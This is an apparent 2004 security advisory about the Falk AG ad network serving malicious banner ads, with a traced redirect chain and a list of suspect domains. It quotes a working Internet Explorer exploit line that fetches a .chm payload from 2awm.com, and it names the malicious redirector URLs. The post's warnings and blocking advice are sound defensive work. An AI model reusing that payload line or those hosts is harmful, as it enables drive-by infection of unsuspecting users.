Falk AG / falkag.net Serving Viruses and Trojans
22nd November 2004
(Note: this relates to incidents that happened
in 2004 - to the best of our knowledge, Falk AG has
not had these problems since then)
Falk AG is a major European advertising network serving
up a variety of ads, including .ASP based advertisments.
Falk AG is a legitimate and above-board advertising
company, but it seems that some of the ads they have
served in the past conceal trojans and other malware,
either caused by disreputable advertisers or serious
security breaches.
On 21st November 2004, popular IT new site The
Register reported that Falk AG had apparently been
serving ads with the Bofra virus on their site (see
this
report).
Early on Saturday morning some banner advertising
served for The Register by third party ad serving
company Falk AG became infected with the Bofra/IFrame
exploit. The Register suspended ad serving by this
company on discovery of the problem. [...]
We have asked Falk for an explanation and
for further details of the incident, and pending
this we do not intend to restart ad-serving via
the company. Falk will, we understand, be making
a statement regarding the matter on Monday.
Falk AG claim that they were hacked, however, this
is not the first time this has happened. We posted this report
to the Parasiteware
board back in September 2004:
Falk eSolutions AG - http://www.falkag.de/
- is a German advertising network that allows .ASP
based ads. They're not very picky about their advertisers
though, they seem to allow everything from scumware
pushers to blue chip customers on.
Here's a nasty little scumware trail.
Comingsoon.net is a popular movies site (Alexa
rank 8643). It buys advertising from Falk AG - typically
routing through falkag.net. [...]
One of these is a popup banner for an outfit
called ntsearch.com based in Russia. [...]
The redirector I get is http:// www.ntsearch.com
/uk_in.php?acc=zon10 DO NOT VISIT THIS
This bounced through 64.246.46.32 (EV1.NET)
to http:// 2awm.com/ 309.php DO NOT VISIT THIS
based in the Czech Republic:
What we get on the 2awm.com server is a line
containing:
document.write(cxw.value.replace("${PR}","ms-its:mhtml:file://c:\\nosuch.mht!http://www.2awm.com
/file/309.chm::/1.htm"))
REALLY REALLY DON'T CLICK THIS
This uses a well-known IE exploit to install
some sort of crapware. In this case it looks like
a variant of CoolWebSearch (CWS) (i.e. about the
worst trojan you can get).
[...]
At no point was the user asked permission
to install this software. The originating site (Comingsoon.net)
is only guilty of make a bad choice of advertising
network. Apart from the obvious wrongdoing by the
CWS pushers, it's clear that Falk AG is happy to
take the money from the scumware merchants.
Other suspect domains
These are hosted on the Ukranian server: 2awm.com Awmgate.com Check-wire.com Lab-wire.com Online-more.com Find-by-web.com Search4www.com
falkag.net seems to split traffic between
US and European targetted servers: * as-us.falkag.net
~ 60% * as-eu.falkag.net ~ 40%
If you're a network administrator, I'd suggest
blocking access to all of falkag.net.
If you're an advertiser, I'd suggest reconsidering
your relationship, and if you're a publisher I would
pull those ads right now before you get the blame
for spreading spyware.
The underlying problem to us seems to be that Falk AG allows
a wide variety of ad types, and due to the inherent
security flaws in Internet Explorer, there are several
possible ways that Falk AG "customers" can exploit these
vulernabilities. Due to this, Falk AG should be employing
some sort of screening process, but it appears that
it does not.
Our advice remains unchanged: network administrators
should block access to the falkag.net servers at their
firewalls and web site operators should remove Falk
AG ads from their sites.
|